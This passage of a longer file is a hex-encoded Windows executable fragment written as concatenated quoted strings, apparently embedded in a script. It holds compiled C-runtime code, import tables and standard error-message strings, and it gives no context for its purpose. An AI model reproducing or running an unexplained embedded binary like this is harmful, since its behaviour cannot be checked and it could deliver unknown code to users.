'058bf08b0cbde074420083e61fc1e606f6440e0401743d833c0eff7437833' \ 'd6877420001751f33c92bc17410487408487513516af4eb08516af5eb0351' \ '6af6ff15a0a041008b04bde0744200830c06ff33c0eb16e84c8cffffc7000' \ '9000000e80d8cffff83200083c8ff5f5e5dc3558bec8b4d0883f9fe7515e8' \ 'f38bffff832000e81f8cffffc70009000000eb4285c978263b0dd08042007' \ '31e8bc1c1f80583e11f8b0485e0744200c1e106f64408040174058b04085d' \ 'c3e8b48bffff832000e8e08bffffc70009000000e8668bffff83c8ff5dc35' \ '58bec8b4d088bc183e11fc1f805c1e1068b0485e074420083c10c03c150ff' \ '15eca041005dc36a186800314200e87d9effff83ceff8975d88975dc8b7d0' \ '883fffe7518e8548bffff832000e8808bffffc70009000000e9bd00000085' \ 'ff0f889d0000003b3dd08042000f83910000008bc7c1f8058945e48bdf83e' \ '31fc1e3068b0485e07442000fbe44180483e001747057e8f1fdffff598365' \ 'fc008b45e48b0485e0744200f6441804017418ff7514ff7510ff750c57e86' \ '700000083c4108bf08bdaeb15e8078bffffc70009000000e8c88affff8320' \ '008bde8975d8895ddcc745fcfeffffffe80d0000008bd3eb2b8b7d088b5dd' \ 'c8b75d857e802ffffff59c3e8978affff832000e8c38affffc70009000000' \ 'e8498affff8bd68bc6e8d39dffffc3558bec5151568b75085756e867fefff' \ 'f83cfff593bc77511e8918affffc700090000008bc78bd7eb44ff75148d4d' \ 'f851ff7510ff750c50ff152ca1410085c0750fff15c0a0410050e8408afff' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ 'ffff8b45f083b8a80000000075158b4d0885c974060fb60666890133ff47e' \ '9840000008d45f0500fb60650e8d241ffff595985c074408b7df0837f7401' \ '7e273b5f747c2533c03945080f95c050ff7508ff7774566a09ff7704ff15a' \ '4a141008b7df085c0750b3b5f74722e807e010074288b7f74eb3133c03945' \ '080f95c033ff4750ff75088b45f057566a09ff7004ff15a4a1410085c0750' \ 'ee86889ffff83cfffc7002a000000807dfc0074078b4df8836170fd8bc75f' \ 'e936ffffff558bec6a00ff7510ff750cff7508e8fafeffff83c4105dc3558' \ 'bec51a1a06e420083f8fe750ae8b8080000a1a06e420083f8ff7507b8ffff' \ '0000c9c36a008d4dfc516a018d4d085150ff15b0a1410085c074e2668b450' \ '8c9c3558bec83ec10a16063420033c58945fc5356578b7d0cf6470c400f85' \ '3601000057e8378effff59bb506c420083f8ff742e57e8268effff5983f8f' \ 'e742257e81a8effff8bf057c1fe05e80f8effff83e01f59c1e0060304b5e0' \ '74420059eb028bc38a4024247f3c020f84e800000057e8e98dffff5983f8f' \ 'f742e57e8dd8dffff5983f8fe742257e8d18dffff8bf057c1fe05e8c68dff' \ 'ff83e01f59c1e0060304b5e074420059eb028bc38a4024247f3c010f849f0' \ '0000057e8a08dffff5983f8ff742e57e8948dffff5983f8fe742257e8888d' \ 'ffff8bf057c1fe05e87d8dffff8bd883e31f59c1e306031cb5e074420059f' \ '6430480745fff75088d45f46a05508d45f050e80bf5ffff83c41085c07407' \ 'b8ffff0000eb5f33f63975f07e32ff4f0478128b0f8a4435f488018b070fb' \ '608408907eb100fbe4435f45750e867beffff59598bc883f9ff74c6463b75' \ 'f07cce668b4508eb20834704fe780d8b0f8b4508668901830702eb0d0fb74' \ '5085750e83507000059598b4dfc5f5e33cd5be8463effffc9c3558becff05' \ '7874420056be0010000056e839a1ffff598b4d0889410885c0740983490c0' \ '8897118eb1183490c048d4114894108c74118020000008b41088361040089' \ '015e5dc3558bec83ec24a16063420033c58945fc8b4508538b1df4a141005' \ '6578945e48b450c33ff578945e0ffd38bf08975e8e8a889ffff8945ec393d' \ '148042000f85ae0000006800080000576804f84100ff1508a241008bf085f' \ '67524ff15c0a0410083f8570f85680100006804f84100ff1528a141008bf0' \ '85f60f8453010000681cf8410056ff15a4a0410085c00f843f01000050ffd' \ '36828f8410056a314804200ff15a4a0410050ffd36838f8410056a3188042' \ '00ff15a4a0410050ffd3684cf8410056a31c804200ff15a4a0410050ffd3a' \ '32480420085c074146868f8410056ff15a4a0410050ffd3a3208042008b75' \ 'e8ff15e4a1410085c0741b8b45e485c0740750ff15b4a14100397dec741d6' \ 'a0458e9bd000000397dec7410ff3514804200ff15f8a141006a03ebe5a120' \ '8042008b1df8a141003bc6744f393524804200744750ffd3ff35248042008' \ '945ecffd38b4dec8945e885c9742f85c0742bffd185c0741a8d4ddc516a0c' \ '8d4df0516a0150ff55e885c07406f645f801750b8b751081ce00002000eb3' \ '0a1188042003bc6742450ffd385c0741dffd08bf885ff7415a11c8042003b' \ 'c6740c50ffd385c0740557ffd08bf88b7510ff3514804200ffd385c0740c5' \ '6ff75e0ff75e457ffd0eb0233c08b4dfc5f5e33cd5be81e3cffffc9c3558b' \ 'ec668b45086a3059663bc10f82870100006683f83a73070fb7c02bc15dc3b' \ '<KEY>' \ '<KEY>' \ 'bc172e3ba66090000663bc20f822b0100008d4a0a663bc172cd8d5176663b' \ 'c20f82170100008d4a0a663bc172b98d5176663bc20f82030100008d4a0a6' \ '63bc172a58d5176663bc20f82ef0000008d4a0a663bc172918d5176663bc2' \ '0f82db0000008d4a0a663bc10f8279ffffffba660c0000663bc20f82c1000' \ '0008d4a0a663bc10f825fffffff8d5176663bc20f82a90000008d4a0a663b' \ 'c10f8247ffffff8d5176663bc20f82910000008d4a0a663bc10f822ffffff' \ 'fba500e0000663bc2727b8d4a0a663bc10f8219ffffff8d5176663bc27267' \ '<KEY>' \ 'fffba40100000663bc2723d8d4a0a663bc10f82dbfeffffbae0170000663b' \ 'c272278d4a0a663bc10f82c5feffff83c230663bc2721383c130eb05b91af' \ 'f0000663bc10f82aafeffff83c8ff5dc3cccccccc8b4424088b4c24100bc8' \ '8b4c240c75098b442404f7e1c2100053f7e18bd88b442408f764241403d88' \ 'b442408f7e103d35bc21000cccccccccccccccccccccccc558bec53565755' \ '6a006a006838864100ff7508e8680400005d5f5e5b8be55dc38b4c2404f74' \ '10406000000b80100000074328b4424148b48fc33c8e8f939ffff558b6810' \ '8b5028528b502452e81400000083c4085d8b4424088b5424108902b803000' \ '000c35356578b44241055506afe684086410064ff3500000000a160634200' \ '33c4508d44240464a3000000008b4424288b58088b700c83feff743a837c2' \ '42cff74063b74242c762d8d34768b0cb3894c240c89480c837cb304007517' \ '68010100008b44b308e8490000008b44b308e85f000000ebb78b4c2404648' \ '90d0000000083c4185f5e5bc333c0648b0d00000000817904408641007510' \ '8b510c8b520c3951087505b801000000c35351bb906e4200eb0b5351bb906' \ 'e42008b4c240c894b08894304896b0c55515058595d595bc20400ffd0c355' \ '8bec8b4508f7d81bc083e0015dc36a02e8d39cffff59c36a106820314200e' \ '8e594ffff8b750883fefe7518e8c581ffff832000e8f181ffffc700090000' \ '00e99500000085f678793b35d080420073718bdec1fb058bfe83e71fc1e70' \ '68b049de07442000fbe44380483e001745356e86df4ffff598365fc008b04' \ '9de0744200f644380401740b56e855000000598bf8eb0ee89381ffffc7000' \ '900000083cfff897de4c745fcfeffffffe80a0000008bc7eb298b75088b7d' \ 'e456e89bf5ffff59c3e83081ffff832000e85c81ffffc70009000000e8e28' \ '0ffff83c8ffe86d94ffffc3558bec56578b7d0857e803f5ffff5983f8ff74' \ '50a1e074420083ff017509f6808400000001750b83ff02751cf6404401741' \ '66a02e8d8f4ffff6a018bf0e8cff4ffff59593bc6741c57e8c3f4ffff5950' \ 'ff15c4a0410085c0750aff15c0a041008bf0eb0233f657e81ff4ffff598bc' \ 'fc1f90583e71f8b0c8de0744200c1e706c64439040085f6740c56e89980ff' \ '<KEY>' \ '41aff7608e8d860ffff81660cf7fbffff33c05989068946088946045e5dc3' \ 'a1a06e420083f8ff740c83f8fe740750ff15c4a04100c333c050506a03506' \ 'a0368000000406880f84100ff1514a14100a3a06e4200c3558bec51568b75' \ '0c5756e8a585ffff598b4e0c8bf8f6c1827519e82980ffffc700090000008' \ '34e0c20b8ffff0000e929010000f6c140740de80b80ffffc70022000000eb' \ 'e05333dbf6c1017413895e04f6c110747f8b460883e1fe8906894e0c8b460' \ 'c83e0ef83c80289460c895e04a90c010000752ae84240ffff83c0203bf074' \ '0ce83640ffff83c0403bf0750b57e861ebffff5985c0750756e83df8ffff5' \ '9f7460c08010000747d8b56088b0e8d420289068b46182bca83e802894d0c' \ '89460485c97e17515257e8ca9dffff83c40c8bd8eb4783c920894e0ceb758' \ '3ffff741b83fffe74168bcf8bc783e11fc1f805c1e106030c85e0744200eb' \ '05b9506c4200f641042074146a02535357e88df3ffff23c283c41083f8ff7' \ '<KEY>' \ '000000e8579dffff8b4d0883c40c8bd83b5d0c740b834e0c20b8ffff0000e' \ 'b030fb7c15b5f5ec9c3ccff25e8a14100ff251ca241008b5424088d420c8b' \ '4aec33c8e8a235ffffb800304200e9a16cffffff75e8ff75e4e8cb90feff5' \ '959c38b4de4e93894feff8b5424088d420c8b4ae033c8e87135ffffb87031' \ '4200e9706cffff8b5424088d420c8b4ae033c8e85635ffffb8d8314200e95' \ '56cffff8b4df083c104e9f793feff8b4df083c108e94085feff8b5424088d' \ '420c8b4aec33c8e82535ffffb8f8324200e9246cffff8d4ddce9c993feff8' \ 'd4de8e9c193feff8d4dcce9b993feff8d4dcce9d488feff8d4de4e9a993fe' \ 'ff8d4dd4e9a193feff8d4dc4e99993feff8d4dc4e9b488feff8d4d08e9899' \ '3feff8d4dc4e98193feff8d4dc4e99c88feff8d4d08e97193feff8d4dc4e9' \ '6993feff8d4dc4e98488feff8b5424088d420c8b4ab033c8e89a34ffffb86' \ '0324200e9996bffff8d4d0ce93e93feff8b5424088d420c8b4aec33c8e877' \ '34ffffb830324200e9766bffff8d4de0e91b93feff8d4ddce91393feff8d4' \ 'dd8e90b93feff8b5424088d420c8b4ab433c8e84434ffffb8b8334200e943' \ '6bffff8d4df0e9e892feff8d4de8e9e092feff8d4de4e9d892feff8d4de4e' \ '9d092feff8d4de4e9c892feff8d4de4e9c092feff8d4de4e9b892feff8b54' \ '24088d420c8b4ac033c8e8f133ffffb820344200e9f06affff8d8dd0fefff' \ 'fe921a2feff8b5424088d829cfeffff8b8a98feffff33c8e8c533ffff83c0' \ '<KEY>' \ '433c8e89d33ffffb82c334200e99c6affff8d4d08e94192feff8d4de8e939' \ '92feff8b5424088d420c8b4ae033c8e87233ffffb87c344200e9716affff8' \ 'b5424088d420c8b4ae833c8e85733ffffb804364200e9566affffff7508ff' \ '75e8e8808efeff5959c38b5424088d420c8b4ae433c8e82e33ffffb8a4354' \ '200e92d6affffff7508ff75f0e8578efeff5959c38b5424088d420c8b4aec' \ '33c8e80533ffffb85c364200e9046affff8b4df0e9a991feff8b4df083c10' \ '4e99e91feff8b5424088d420c8b4aec33c8e8d732ffffb818354200e9d669' \ 'ffff8d4db0e97b91feff8b5424088d420c8b4aa833c8e8b432ffff8b4afc3' \ '3c8e8aa32ffffb82c374200e9a969ffff8d8dc8f7ffffe94b91feff8d8dcc' \ 'f7ffffe94091feff8d8dccf7ffffe93591feff8b5424088d420c8b8ab8f7f' \ 'fff33c8e86b32ffff8b4afc33c8e86132ffffb858374200e96069ffff8d8d' \ '9cf7ffffe954c1feff8d8dc8f7ffffe9f790feff8b85b8f7ffff83e0010f8' \ '41200000083a5b8f7fffffe8d8dacf7ffffe9d690feffc38d8da8f7ffffe9' \ 'ca90feff8b85b8f7ffff83e0020f841200000083a5b8f7fffffd8d8db0f7f' \ 'fffe9a990feffc38b5424088d420c8b8a98f7ffff33c8e8de31ffff8b4afc' \ '33c8e8d431ffffb8e0364200e9d368ffff8d4dd0e99b85feff8d4dd0e9938' \ '5feff8b5424088d420c8b4acc33c8e8a931ffffb8b0344200e9a868ffff8b' \ '5424088d420c8b4ae433c8e88e31ffffb888364200e98d68ffff8b5424088' \ 'd420c8b4ae033c8e87331ffffb84c354200e97268ffffff7508ff75f0e89c' \ '8cfeff5959c3ff7508ff75f0e88e8cfeff5959c38b5424088d420c8b4aec3' \ '3c8e83c31ffffb8e4344200e93b68ffff8d8d20ffffffe94381feff8d8d48' \ 'ffffffe98facfeff8d8d0cffffffe9c78ffeff8d8d0cffffffe9bc8ffeff8' \ 'd8d0cffffffe9b18ffeff8d8d38ffffffe9a68ffeff8d8d3cffffffe99b8f' \ 'feff8d8d44ffffffe9908ffeff8d8d1cffffffe9858ffeff8d8d1cffffffe' \ '97a8ffeff8b5424088d820cffffff8b8a08ffffff33c8e8ad30ffffb89837' \ '4200e9ac67ffff8d4de4e9518ffeff8d4de0e9498ffeff8d4de8e9418ffef' \ 'f8d4de4e9398ffeff8d4dece9318ffeff8d4df0e9298ffeff8d4de0e9218f' \ 'feff8d4de4e9198ffeff8d4dece9118ffeff8b5424088d420c8b4adc33c8e' \ '84a30ffffb848384200e94967ffff8d8dfcfbffffe9eb8efeff8d8de4fbff' \ 'ffe94680feff8d8d00fcffffe9d58efeff8d8df8fbffffe9ca8efeff8d8dd' \ 'cfbffffe9bf8efeff8d8df8fbffffe9b48efeff8d8db0fbffffe9cc83feff' \ '8d8df8fbffffe99e8efeff8d8d00fcffffe9938efeff8d8ddcfbffffe9888' \ 'efeff8d8d00fcffffe97d8efeff8d8db0fbffffe99583feff8d8d00fcffff' \ 'e9678efeff8d8dd0fbffffe95c8efeff8d8d00fcffffe9518efeff8d8dd0f' \ 'bffffe9468efeff8d8db0fbffffe95e83feff8b5424088d420c8b8aacfbff' \ 'ff33c8e8712fffff8b4afc33c8e8672fffffb8c8384200e96666ffff8d4de' \ 'ce90b8efeff8d4ddce9038efeff8b5424088d420c8b4ad833c8e83c2fffff' \ 'b810384200e93b66ffff8d8de05fffffe9dd8dfeff8b5424088d420c8b8ac' \ 'c5fffff33c8e8132fffff8b4af833c8e8092fffffb878394200e90866ffff' \ '8b45ec83e0010f840c0000008365ecfe8b4de4e99d8dfeffc38d4dcce9b0e' \ '7feff8d4dd8e9a8e7feff8d4dc0e9a0e7feff8b5424088d420c8b4abc33c8' \ 'e8bd2effffb8d8394200e9bc65ffff8d4df0e9618dfeff8b5424088d420c8' \ 'b4aec33c8e89a2effffb8683a4200e99965ffff8d4de0e93e8dfeff8d4de4' \ 'e9368dfeff8d4dece92e8dfeff8b45d483e0010f840c0000008365d4fe8d4' \ 'dece9168dfeffc38d4dd0e90d8dfeff8b5424088d420c8b4acc33c8e8462e' \ 'ffffb81c3a4200e94565ffff8d4df0e9ea8cfeff8d4dace9e28cfeff8d4dc' \ 'ce9da8cfeff8d4dd8e9d28cfeff8d4dd8e9ca8cfeff8d4dd0e9c28cfeff8b' \ '45e483e0010f840c0000008365e4fe8d4dd0e9aa8cfeffc38b45e483e0020' \ 'f840c0000008365e4fd8d4dd0e9918cfeffc38d4de0e9888cfeff8d4de0e9' \ '808cfeff8d4de0e9788cfeff8b5424088d420c8b8a34ffffff33c8e8ae2df' \ 'fffb8983a4200e9ad64ffff8b5424088d420c8b4ae033c8e8932dffffb870' \ '3b4200e99264ffff8b5424088d420c8b4ae833c8e8782dffffb8183b4200e' \ '97764ffff8b4df0e91c8cfeff8b5424088d420c8b4aec33c8e8552dffffb8' \ 'f43b4200e95464ffff8b45f083e0010f840c0000008365f0fe8b4dece9e98' \ '<KEY>' \ '8d8dd8fbffffe9c28bfeff8d8ddcfbffffe9b78bfeff8d8dd0fbffffe9ac8' \ '<KEY>' \ 'ffffb84c3d4200e9d763ffff8d8dccfbffffe9798bfeff8d8dc0fbffffe96' \ 'e8bfeff8d8dc8fbffffe9638bfeff8d8ddcfbffffe9588bfeff8d8dd4fbff' \ 'ffe94d8bfeff8d8dd8fbffffe9428bfeff8d8dbcfbffffe9378bfeff8d8dd' \ '8fbffffe92c8bfeff8b5424088d420c8b8ab8fbffff33c8e8622cffff8b4a' \ 'fc33c8e8582cffffb8f03e4200e95763ffff8d8dccfffeffe9f98afeff8d8' \ 'de4fffeffe9ee8afeff8b85d4fffeff83e0010f841200000083a5d4fffeff' \ 'fe8d8de4fffeffe9cd8afeffc38b85d4fffeff83e0020f841200000083a5d' \ '4fffefffd8d8de4fffeffe9ab8afeffc38d8ddcfffeffe99f8afeff8b85d4' \ 'fffeff83e0040f841200000083a5d4fffefffb8d8ddcfffeffe97e8afeffc' \ '38d8de0fffeffe9728afeff8b5424088d420c8b8aa4fffeff33c8e8a82bff' \ 'ff8b4afc33c8e89e2bffffb8703f4200e99d62ffff8d8d1cf8ffffe93f8af' \ 'eff8d8d18f8ffffe9348afeff8b5424088d420c8b8a0cf8ffff33c8e86a2b' \ 'ffff8b4afc33c8e8602bffffb8183d4200e95f62ffff8d8dd8fbffffe9018' \ 'afeff8d8db0fbffffe9f689feff8d8d9cfbffffe9eb89feff8d8da4fbffff' \ 'e9e089feff8d8dbcfbffffe9d589feff8d8da8fbffffe9ca89feff8d8db8f' \ 'bffffe9bf89feff8d8db4fbffffe9b489feff8d8dacfbffffe9a989feff8b' \ '5424088d420c8b8a98fbffff33c8e8df2affff8b4afc33c8e8d52affffb82' \ '03c4200e9d461ffff8d4de8e97989feff8d4df0e97189feff8d4ddce96989' \ 'feff8d4de0e96189feff8d4de0e95989feff8d4ddce95189feff8b5424088' \ 'd420c8b4ad433c8e88a2affffb8883d4200e98961ffff8d4ddce92e89feff' \ '8d4df0e92689feff8d4de4e91e89feff8d4d8ce9afb8feff8d4db4e9a7b8f' \ 'eff8d4de0e90689feff8b5424088d420c8b4a8833c8e83f2affffb8103e42' \ '00e93e61ffff8d8ddcbfffffe9e088feff8d8dd4bfffffe9d588feff8d8db' \ '4bfffffe9ca88feff8d8de0bfffffe9bf88feff8d8de0bfffffe9b488feff' \ '8d8de8bfffffe9a988feff8d8de0bfffffe99e88feff8d8dd4bfffffe9938' \ '8feff8d8de8bfffffe98888feff8d8de8bfffffe97d88feff8b5424088d42' \ '0c8b8aacbfffff33c8e8b329ffff8b4afc33c8e8a929ffffb8903c4200e9a' \ '860ffff8d4d88e9e6b7feff8d4db0e9deb7feff8b5424088d420c8b4a8433' \ 'c8e87e29ffffb8dc3d4200e97d60ffff8d8d30ffffffe9b8b7feff8d8d58f' \ 'fffffe9adb7feff8d4d80e96b0effff8d4dcce90488feff8d4dcce9fc87fe' \ 'ff8d4dc8e9f487feff8d4dcce9ec87feff8b5424088d420c8b8a2cffffff3' \ '3c8e82229ffff8b4afc33c8e81829ffffb8643e4200e91760ffff8d4dace9' \ 'bc87feff8b5424088d420c8b4a9c33c8e8f528ffff8b4afc33c8e8eb28fff' \ 'fb8c03e4200e9ea5fffff8d8d98bfffffe925b7feff8d8dc0bfffffe91ab7' \ 'feff8b5424088d828cbfffff8b8a88bfffff33c8e8b428ffff83c00c8b4af' \ '833c8e8a728ffffb808404200e9a65fffff8d8dccfbffffe94887feff8d8d' \ 'd0fbffffe93d87feff8d8dc8fbffffe93287feff8b5424088d82c4fbffff8' \ 'b8ac0fbffff33c8e86528ffff83c00c8b4af833c8e85828ffffb8cc3f4200' \ 'e9575fffff8d4dd8e9fc86feff8d4dd8e9f486feff8d4dd0e9ec86feff8b5' \ '424088d420c8b4ac433c8e82528ffff8b4afc33c8e81b28ffffb8d0404200' \ 'e91a5fffff8b85dcfbffff83e0010f841200000083a5dcfbfffffe8b8dd8f' \ 'bffffe9a686feffc38b5424088d420c8b8ad0fbffff33c8e8db27ffff8b4a' \ 'fc33c8e8d127ffffb8a4404200e9d05effff8b45f083e0010f840c0000008' \ '365f0fe8b4de8e96586feffc38d4dece95c86feff8b5424088d420c8b4ae4' \ '33c8e89527ffffb83c404200e9945effff8d4df0e93986feff8d4dece9318' \ '6feff8b5424088d420c8b4ae833c8e86a27ffffb884414200e9695effff8d' \ '4df0e90e86feff8b5424088d420c8b4adc33c8e84727ffffb8b8414200e94' \ '65effff8d4de4e9eb85feff8d4de8e9e385feff8b5424088d420c8b4adc33' \ 'c8e81c27ffffb870404200e91b5effff8d4de8e9c085feff8d4de4e9b885f' \ 'eff8d4dece9b085feff8d4dece9a885feff8b5424088d420c8b4adc33c8e8' \ 'e126ffffb80c414200e9e05dffff6800604200b974804200e8a085feff683' \ 'c9a4100e8eb3effff59c3e8e47efeff684a9a4100a378804200e8d53effff' \ '59c368659a4100e8c93effff59c3685a9a4100e8bd3effff59c3684f9a410' \ '0e8b13effff59c36800604200b984804200e84b85feff68709a4100e8963e' \ 'ffff59c3ff1520a14100687e9a4100c705c070420048a34100a3c4704200c' \ '605c870420000e86e3effff59c368889a4100e8623effff59c3b9cc704200' \ 'e84c23ffff68939a4100e84c3effff59c38b0d748042008d49f0e91085fef' \ 'fe99a04ffffc705b0704200c8a34100c3c705b8704200c8a34100c3c705b4' \ '704200c8a34100c38b0d848042008d49f0e9dc84feffb9c0704200e93a21f' \ 'fffc705006042005ca34100c3b9cc704200e94023ffff0000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000' \ '00000000000000000000000344902001c49020004490200e6480200c84802' \ '00b4480200a4480200924802007c4802006c4802005448020042480200324' \ '802002048020006480200ec470200d4470200ba470200aa47020098470200' \ '7a4702006c470200dc460200fc460200184702002e4702004447020058470' \ '20000000000105102001a5102002c510200405102004e5102005c51020072' \ '510200825102009c510200b6510200d0510200e0510200bc4b02005a49020' \ '06c4902007c4902008c4902009c490200ae490200c2490200d2490200e049' \ '0200f4490200044a0200144a0200204a02003a4a0200584a0200764a02009' \ '24a0200aa4a0200c24a0200da4a0200ec4a0200fa4a0200104b0200184b02' \ '00244b0200384b02004a4b02005c4b02006a4b0200824b02008e4b0200a04' \ 'b0200ac4b0200f0510200ce4b0200e24b0200fa4b02000c4c0200204c0200' \ '364c02004c4c02006a4c0200864c02009e4c0200ac4c0200bc4c0200d04c0' \ '200e24c0200f44c02000e4d0200284d02003c4d02004c4d0200584d020066' \ '4d0200724d0200884d02009e4d0200b84d0200ce4d0200e24d0200fe4d020' \ '0164e0200224e0200384e02004e4e0200764e0200864e02009c4e0200ae4e' \ '0200c44e0200d64e020002510200f4500200e8500200f24e0200004f02000' \ 'e4f02001a4f02002c4f0200404f02005c4f02007c4f0200904f0200a04f02' \ '00b04f0200c04f0200d64f0200e44f0200f64f020010500200285002003e5' \ '002004c500200585002006a50020074500200805002008c5002009e500200' \ 'ae500200ca50020000000000944602007046020080460200ba460200a4460' \ '200000000009645020086450200000000002046020000000000fa450200e0' \ '450200cc450200b8450200000000005245020038450200684502000000000' \ '03a460200524602000000000000000000f29941001a9a4100269a41008299' \ '41009d994100b3994100bf994100cb994100d799410000000000000000005' \ 'cc9400061d74000e9fb40007e0641001554410000000000000000002c0b41' \ '00dc30410003894100cfc9400000000000000000000000000000000000000' \ '0000000000000a9dded54000000000200000042000000f0250200f0150200' \ '00000000a9dded54000000000c00000010000000342602003416020085bc4' \ '000a9bc400046bd4000d2bc4000febb40001dbc40009dbc4000e7bc4000c4' \ 'bc40009abc4000debb4000282849d33841d44fb3ecdb99135eae867826420' \ '026bf40008bf2400062616420616c6c6f636174696f6e0000c42642004bbf' \ '40008bf24000102742004bbf40008bf24000602742004bbf40008bf240008' \ '0294200aaad400003e8400003e84000e9ad40001aae4000fbad4000342942' \ '00aaad400037ae40003dae4000e9ad40001aae4000fbad400094294200aaa' \ 'd400068ae40006eae4000e9ad40001aae4000fbad4000dc294200aaad4000' \ '9dae4000a3ae4000ceae40001aae4000fbad4000000000000500000008a94' \ '100b70000001ca941001400000028a941006f00000038a94100aa0000004c' \ 'a941008e0000004ca941005200000008a94100f303000064a94100f403000' \ '064a94100f503000064a941001000000008a941003700000028a941006409' \ '00004ca941009100000070a941000b01000084a941007000000098a941005' \ '00000001ca9410002000000aca941002700000098a941000c00000008a941' \ '000f00000028a9410001000000c8a941000600000084a941007b00000084a' \ '9410021000000e0a94100d4000000e0a941008300000084a94100e6030000' \ '08a9410008000000f4a941001500000008aa41001100000028aa41006e000' \ '00064a94100610900004ca94100e30300003caa41000e000000f4a9410003' \ '000000aca941001e00000064a94100d504000008aa41001900000064a9410' \ '02000000008a941000400000050aa41001d00000064a941001300000008a9' \ '41001d27000064aa41004027000078aa41004127000088aa41003f270000a' \ '0aa410035270000c0aa410019270000e0aa410045270000f4aa41004d2700' \ '0008ab4100462700001cab41003727000030ab41001e27000050ab4100512' \ '700005cab41003427000070ab41001427000088ab41002627000094ab4100' \ '48270000a8ab410028270000bcab410038270000d0ab41004f270000e0ab4' \ '10042270000f4ab41004427000004ac41004327000014ac41004727000028' \ 'ac41003a27000038ac4100492700004cac4100362700005cac41003d27000' \ '06cac41003b27000084ac4100392700009cac41004c270000b0ac41003327' \ '0000bcac4100000000000000000066000000d4ac410064000000f4ac41006' \ '500000004ad4100710000001cad41000700000030ad41002100000048ad41' \ '000e00000060ad4100090000006cad41006800000080ad4100200000008ca' \ 'd41006a00000098ad410067000000acad41006b000000ccad41006c000000' \ 'e0ad41001200000028aa41006d000000f4ad4100100000004ca9410029000' \ '00070a941000800000014ae4100110000001ca941001b0000002cae410026' \ '00000038a9410028000000c8a941006e0000003cae41006f00000050ae410' \ '02a00000064ae4100190000007cae41000400000088ab41001600000084a9' \ '41001d000000a0ae41000500000064a9410015000000b0ae410073000000c' \ '0ae410074000000d0ae410075000000e0ae410076000000f0ae4100770000' \ '0004af41000a00000014af41007900000028af410027000000e0a94100780' \ '0000030af41007a00000048af41007b00000054af41001c00000098a94100' \ '7c00000068af4100060000007caf41001300000028a9410002000000aca94' \ '1000300000098af410014000000a8af410080000000b8af41007d000000c8' \ 'af41007e000000d8af41000c000000f4a9410081000000e8af41006900000' \ '03caa410070000000f8af41000100000010b041008200000028b041008c00' \ '000040b041008500000058b041000d00000008a941008600000064b041008' \ '700000074b041001e0000008cb0410024000000a4b041000b00000008aa41' \ '0022000000c4b041007f000000d8b0410089000000f0b041008b00000000b' \ '141008a00000010b14100170000001cb141001800000050aa41001f000000' \ '3cb14100720000004cb14100840000006cb14100880000007cb1410000000' \ '000000000007065726d697373696f6e2064656e69656400000066696c6520' \ '657869737473006e6f207375636820646576696365000066696c656e616d6' \ '520746f6f206c6f6e67000000646576696365206f72207265736f75726365' \ '206275737900696f206572726f72000000006469726563746f7279206e6f7' \ '420656d70747900696e76616c696420617267756d656e74000000006e6f20' \ '7370616365206f6e2064657669636500006e6f20737563682066696c65206' \ 'f72206469726563746f727900000066756e6374696f6e206e6f7420737570' \ '706f7274656400006e6f206c6f636b20617661696c61626c650000006e6f7' \ '420656e6f756768206d656d6f72790000007265736f7572636520756e6176' \ '61696c61626c652074727920616761696e000063726f73732064657669636' \ '5206c696e6b0000006f7065726174696f6e2063616e63656c65640000746f' \ '6f206d616e792066696c6573206f70656e007065726d697373696f6e5f646' \ '56e696564000000616464726573735f696e5f757365000061646472657373' \ '5f6e6f745f617661696c61626c65000000616464726573735f66616d696c7' \ '95f6e6f745f737570706f7274656400000000636f6e6e656374696f6e5f61' \ '<KEY>' \ '57363726970746f7200636f6e6e656374696f6e5f61626f72746564000063' \ '6f6e6e656374696f6e5f726566757365640000636f6e6e656374696f6e5f7' \ '2657365740000000064657374696e6174696f6e5f616464726573735f7265' \ '717569726564000000006261645f6164647265737300686f73745f756e726' \ '561636861626c65000000006f7065726174696f6e5f696e5f70726f677265' \ '7373000000696e74657272757074656400696e76616c69645f617267756d6' \ '56e7400000000616c72656164795f636f6e6e6563746564000000746f6f5f' \ '6d616e795f66696c65735f6f70656e006d6573736167655f73697a6500000' \ '00066696c656e616d655f746f6f5f6c6f6e670000006e6574776f726b5f64' \ '6f776e000000006e6574776f726b5f72657365740000006e6574776f726b5' \ 'f756e726561636861626c65006e6f5f6275666665725f7370616365006e6f' \ '5f70726f746f636f6c5f6f7074696f6e00006e6f745f636f6e6e656374656' \ '40000006e6f745f615f736f636b6574000000006f7065726174696f6e5f6e' \ '6f745f737570706f727465640070726f746f636f6c5f6e6f745f737570706' \ 'f72746564000077726f6e675f70726f746f636f6c5f747970650074696d65' \ '645f6f75740000006f7065726174696f6e5f776f756c645f626c6f636b000' \ '000616464726573732066616d696c79206e6f7420737570706f7274656400' \ '0000006164647265737320696e20757365000061646472657373206e6f742' \ '0617661696c61626c65000000616c726561647920636f6e6e656374656400' \ '0000617267756d656e74206c69737420746f6f206c6f6e670000617267756' \ 'd656e74206f7574206f6620646f6d61696e00006261642061646472657373' \ '006261642066696c652064657363726970746f7200626164206d657373616' \ '7650062726f6b656e207069706500636f6e6e656374696f6e2061626f7274' \ '65640000636f6e6e656374696f6e20616c726561647920696e2070726f677' \ '26573730000636f6e6e656374696f6e20726566757365640000636f6e6e65' \ '6374696f6e2072657365740000000064657374696e6174696f6e206164647' \ '26573732072657175697265640000000065786563757461626c6520666f72' \ '6d6174206572726f720066696c6520746f6f206c617267650000686f73742' \ '0756e726561636861626c65000000006964656e7469666965722072656d6f' \ '7665640000696c6c6567616c20627974652073657175656e6365000000696' \ 'e617070726f70726961746520696f20636f6e74726f6c206f706572617469' \ '6f6e0000696e76616c6964207365656b00000000697320612064697265637' \ '46f727900006d6573736167652073697a65000000006e6574776f726b2064' \ '6f776e000000006e6574776f726b2072657365740000006e6574776f726b2' \ '0756e726561636861626c65006e6f20627566666572207370616365006e6f' \ '206368696c642070726f63657373000000006e6f206c696e6b006e6f206d6' \ '5737361676520617661696c61626c65000000006e6f206d65737361676500' \ 